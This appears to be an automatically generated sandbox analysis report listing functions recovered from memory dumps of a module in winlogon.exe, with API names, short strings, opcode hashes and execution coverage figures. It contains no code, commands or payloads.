                                                                    Function 000002D0165E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: 94470d76e8e99169dc1bd6030e286acf90538daadbbb330fa07aa5c63b58bfdf
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: BD012931300A9082EB64DBA2A89C799A3A5F788BC5FC84076DE4E43765DF3DCD89C750
                                                                    Function 000002D0165E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: 0ee65fdd732b982381bbf943d3faa4b165bcf9ac086ffcbc2b1acb993f4b5dc0
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 72012975211B80C2EF249BA1EC9C71A73A4BB49B86F94446ADD4D077B5EF3ECA488710
                                                                    Function 000002D0165E8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction ID: 289176f1ec5211bc532f7d3476c86f990fa8211b4c40f3c47dcc25eee0941410
                                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction Fuzzy Hash: CB51A43270168086EF18DFA5EC8CB59B7BAF344B88F908526DE5A47758EB76CE41C700
                                                                    Function 000002D0165E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: b0a73550e19d607c0733c4eed862a0f106358cff4bd746a1ba228e1ad1f57731
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: B6F04F2270468192EB708FA1FCC87A9A760F748B89FD44022DA4D479A4DF7DCE8DCB10
                                                                    Function 000002D0165E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 9f9f7269bcd04a4d7622e5ff7d9e750e699f4d99e062e085e30b3f0fddd74a17
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: 50F08C21704BD082EF008BA3BD8C219A260AB48FC0F888172EE4E07B79DF3CC9458710
                                                                    Function 000002D0165EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 73b21768389709e2f3859606edec8d020a16b8eaf151ef1aa857b1fe75e1916b
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: BCF06D61311A9581EF108BB4EC8C36A6361EB88BA1FD4025ADA6E462F4DF2DC9488320
                                                                    Function 000002D0165E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction ID: 9867a48db4e2f8fc4ca8a19f3b7debced05d252233e4c618cb6bf9eff3b46b8e
                                                                    • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction Fuzzy Hash: 2F619076519B84C6EB60CB95E88831AB7A0F384794F905116FACD47BB4DB7EC954CF00
                                                                    Function 000002D0165F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 8658335e92f09a8eeac19449c432923065bddb668eaed47daa1299e6c01b2058
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 4211A322A52BD411F76415E8DCDD76629406B783B8FC80AB6A97E177F7CB24CC554240
                                                                    Function 000002D016593504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: d75896c64213f2a1704ddb0ef00b701f646facd3cf9c70f6f098307262c4cee0
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 28117326A14ED1D2FB6415E8ECDD36916816B5C37CFC8A63AA96F466F7CA28CC414100
                                                                    Function 000002D01658F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: 7926be692a7c3970f031dc47edbaea785ae167cdd99d474087a09ccf8e4f8d1a
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 4F617D666006C086FB659BEEEDCC32A6AA9A7897C4FD44517CB4F17FB5DB38CC418210
                                                                    Function 000002D0165EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 804a080e077f51fda726543e3350a461b6da8e690454341ee308e9e8ff120439
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 8E615973A00B848AEB20DFA5D88439DB7B0F344B88F444216EF4D17BA8DB39CA95C700
                                                                    Function 000002D0165EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: ad9e7e9185666ca75af795e8e0b1f6e55ca99cc2d9033536fe9523c4600d1b2c
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 9D517C761006C08AEF648BB599C8359B7A0F354B85F984217EE9D47BE5CB39DE90CB00
                                                                    Function 000002D01658A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: ef81340c4c69f026b87580c2449cc675fc22f141087421cbe63eea405b38429c
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 6E516B321006C0CAEB748BA7998835877A8F355B94F988217DE9D87FE5CB38DC91C700
                                                                    Function 000002D016588405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: ebd46bf5b9efac163910b3874f46543552e5e73946441d757bd614891983f18b
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 3251CE327017809AEB14DF96F888B193799F354B98F968126DA5F43FA8EB34DD41C704
                                                                    Function 000002D0165883E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 7c97df61a7296e2470a292fba203d579020853e1c807cf3699b4a2e3da698be7
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: ED316632201780D6E714DB92EC88B1977A8F780B98F968016AE9F07BA8DB38CD41C704
                                                                    Function 000002D0165F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: 5187ed22ee1aa0ccaa690343eb8763e497484eb7c5724e3e0ad55031fafd28ef
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: A1D1D0B2B14A8089E711CFF9D88839C3BB1F3547D8F948256CE9D97BA9DA74C906C740
                                                                    Function 000002D0165F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: fc307cff70842e2266af54710cb554fca6c11a8db0236a9223c07c1d4ecee361
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: AA91AFB260069095F7609FE5DCC83AD2BA4B744BC8F94858BDE4E57AA5DB34CC86C700
                                                                    Function 000002D0165E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: 9a0ea9a6380481f60f05ebf9f0f7dac1e0ce870ea14a63a246dffcc75113e077
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 80113022714F5189EF00CFB0EC983A833A4F719758F840E26EA6D467A4DF78C5A88380
                                                                    Function 000002D0165E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: 8ed4e21bebd3e23e3000fdb066cfaa34740bf68bfd650f15aaa82489475c79c3
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: 6871AF762007C18AEF649EA59CC83AAB794F389BC4F944127DD0E53BA9DE36CF458700
                                                                    Function 000002D016589E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 7d9756844898b90560aff503cb0a52449b1d73c23fde83014149b18977801b46
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 36614A32600B848AEB24DFAAD88439D7BB4F744B88F444216EF4D17BA9DB38D955C740
                                                                    Function 000002D0165E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: 4e8424fe214da5e11d23322d54be976519fd80502f98cc10b4f99395f6fd04db
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: B651A2326047C185EF649BAAA9DC3AAF751F385780FC58127DD9D07B6DDA3ACE048740
                                                                    Function 000002D0165F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: 34cadd197f94b95d681e4a8cd0f756d6a2bd82b0c53d0e2054fc3c1200778bca
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: 19419572715BC085DB209FA5E8883AAB7A1F7987D4F908026EE4D877A4DB7CC945C740
                                                                    Function 000002D0165E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 6af6caf33eed429f26f2400f1c1a474b57e550817839aeb2e9cd6687076bf096
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: 82113032214B8082EB618F25F844359B7E5FB88B94F584222DECC07768DF3DC951C700
                                                                    Function 000002D016587356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: a87dbb86b00b2b98d5e7ae00f565f44d8c78c7afccc986630b2b213103a98e21
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: D9E086A1640B84D0EF018F62EC8439833A4DB58B68FC89123DD5C47321FA38D5F9C300
                                                                    Function 000002D0165873B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: dffd4c35c552f18d438efc623f6b9ab54137c7cb9bea290096256bc086aaf240
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: AFE086A1600B84C0EF018F61E8802987364E758B58FC89123CA4C47321EA38D5E5C300
                                                                    Function 000002D0165E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: 6801c8294921cadce8a74c671636f0fe5ff9b85a627fac1833d6bc37b2bfe6e2
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: 7F118F25701B8481EF54DBA6E888769B3A1FB89FC1F98406ADE4D87775DE39D942C300
                                                                    Function 000002D0165E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: 68d956744345cf7861370da0470b2e65133afa0ec658b7fe96f4140d664497f0
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 57E06535A01A5486EB088FA2DC4C74A36E1FB89F06F88C024C90D07361DF7EC899CBA0

                                                                    Execution Graph

                                                                    Execution Coverage:0.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:123
                                                                    Total number of Limit Nodes:10
